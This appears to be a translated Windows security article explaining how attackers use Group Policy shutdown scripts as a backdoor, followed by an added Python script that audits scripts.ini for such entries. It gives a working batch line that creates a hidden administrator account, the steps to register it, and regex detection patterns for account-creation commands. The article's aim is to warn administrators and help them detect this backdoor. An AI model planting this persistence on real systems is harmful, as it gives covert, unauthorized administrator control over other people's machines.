WINDOWS system backdoor instance 3

Source: Internet
Author: User

Group Policy: the most concealed backdoor

A backdoor planted through Group Policy is harder to spot than the usual persistence tricks. Adding a value under the registry's Run keys is the common way a Trojan gets started with the system, but the same effect can be achieved in Group Policy, which additionally allows a program to run when the system shuts down. This is done through the Scripts (Startup/Shutdown) item, located under "Computer Configuration > Windows Settings". Because this location is rarely inspected, attackers often use it as a backdoor on a compromised server.

After obtaining control of the server, an attacker can use this mechanism to keep long-term control of the host by running arbitrary programs or scripts. The simplest use is to recreate an administrator account, which works as follows:

1) Create the script

Create a batch file named add.bat with the following content:

  @echo off & net user gslw$ test168 /add && net localgroup administrators gslw$ /add & exit

This creates an account named gslw$ with the password test168 and adds it to the local Administrators group.

2) Using the backdoor

In the "Run" dialog box, enter gpedit.msc, go to "Computer Configuration > Windows Settings > Scripts (Startup/Shutdown)", double-click "Shutdown" in the right-hand pane, and add the add.bat script. From then on, every time the system shuts down, the gslw$ user is created. Usually the owner does not know that a hidden user exists in the system; even if he notices the account and deletes it, it is created again at the next shutdown. Unless he knows where to look in Group Policy, he will be puzzled.

In fact, this Group Policy "backdoor" can be abused in many more ways: through it an attacker can run scripts or programs and sniff administrator passwords. Once the administrator password is known, there is no need to create an account at all; the attacker simply logs on remotely with the Administrator account. The feature is therefore a double-edged sword, and we hope you will pay attention to it. If your server is attacked for no apparent reason, check whether this mechanism is being used. (Figure 6)
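The following script is an added example for checking a machine for the persistence described above; it is not part of the original article. It parses the local Group Policy script definition file (assumed to live at %SystemRoot%\System32\GroupPolicy\Machine\Scripts\scripts.ini, with [Startup]/[Shutdown] sections holding numbered CmdLine/Parameters keys), lists every configured startup and shutdown script, flags script bodies that create local accounts or add them to Administrators, and reports account names ending in "$" (which the plain "net user" listing omits). The scripts.ini content, the script body and the user list below are constructed sample data so the example runs offline.

```python
"""Audit local Group Policy startup/shutdown scripts for account-creation persistence.

Added example, not from the original article. Assumptions: the on-disk path of the
local GPO script list and its INI layout ([Startup]/[Shutdown] with 0CmdLine,
0Parameters, 1CmdLine, ... keys). On a real host the file is usually UTF-16 encoded,
so open it with encoding="utf-16" before passing the text to parse_scripts_ini().
"""
import configparser
import os
import re

# Assumed location of the local (non-domain) Group Policy script definitions.
SCRIPTS_INI_PATH = os.path.join(
    os.environ.get("SystemRoot", r"C:\Windows"),
    "System32", "GroupPolicy", "Machine", "Scripts", "scripts.ini",
)

# Constructed sample: one ordinary startup script plus the shutdown entry from the article.
SAMPLE_SCRIPTS_INI = """\
[Startup]
0CmdLine=C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Startup\\inventory.ps1
0Parameters=

[Shutdown]
0CmdLine=C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Shutdown\\add.bat
0Parameters=
"""

# Constructed sample script bodies keyed by path (the add.bat body is the article's).
SAMPLE_BODIES = {
    r"C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup\inventory.ps1":
        "Get-ComputerInfo | Out-File C:\\inventory.txt",
    r"C:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown\add.bat":
        "@echo off & net user gslw$ test168 /add && net localgroup administrators gslw$ /add & exit",
}

# Constructed sample of local account names, as a defender might collect them.
SAMPLE_USERS = ["Administrator", "Guest", "gslw$", "DefaultAccount"]

# Command patterns that deserve a closer look when found in a startup/shutdown script.
SUSPICIOUS_CMDS = [
    re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add\b", re.IGNORECASE),
    re.compile(r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b", re.IGNORECASE),
]


def parse_scripts_ini(text):
    """Return {"Startup": [(cmdline, params), ...], "Shutdown": [...]} from scripts.ini text."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case so "0CmdLine" is looked up as written
    cp.read_string(text)
    result = {}
    for phase in ("Startup", "Shutdown"):
        entries = []
        if cp.has_section(phase):
            section = cp[phase]
            idx = 0
            # Entries are numbered consecutively: 0CmdLine, 1CmdLine, ...
            while f"{idx}CmdLine" in section:
                entries.append((section[f"{idx}CmdLine"], section.get(f"{idx}Parameters", "")))
                idx += 1
        result[phase] = entries
    return result


def flag_script_bodies(bodies):
    """Return the paths whose script text matches an account-creation pattern."""
    return [path for path, body in bodies.items()
            if any(pattern.search(body) for pattern in SUSPICIOUS_CMDS)]


def hidden_style_accounts(usernames):
    """Names ending in '$' look like machine accounts and are left out of 'net user' output."""
    return [name for name in usernames if name.endswith("$")]


def audit(ini_text, bodies, usernames):
    """Combine the three checks into one findings dictionary."""
    scripts = parse_scripts_ini(ini_text)
    return {
        "shutdown_scripts": [cmd for cmd, _ in scripts["Shutdown"]],
        "startup_scripts": [cmd for cmd, _ in scripts["Startup"]],
        "suspicious_scripts": flag_script_bodies(bodies),
        "hidden_style_accounts": hidden_style_accounts(usernames),
    }


if __name__ == "__main__":
    # Runs against the constructed sample; on a real host read SCRIPTS_INI_PATH instead.
    for key, value in audit(SAMPLE_SCRIPTS_INI, SAMPLE_BODIES, SAMPLE_USERS).items():
        print(f"{key}: {value}")
```

On a live system, any shutdown script that is not part of a documented build should be treated as a finding, and the account check can be fed from the output of "net user" plus the Local Users and Groups snap-in, since the latter does show "$"-suffixed names.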
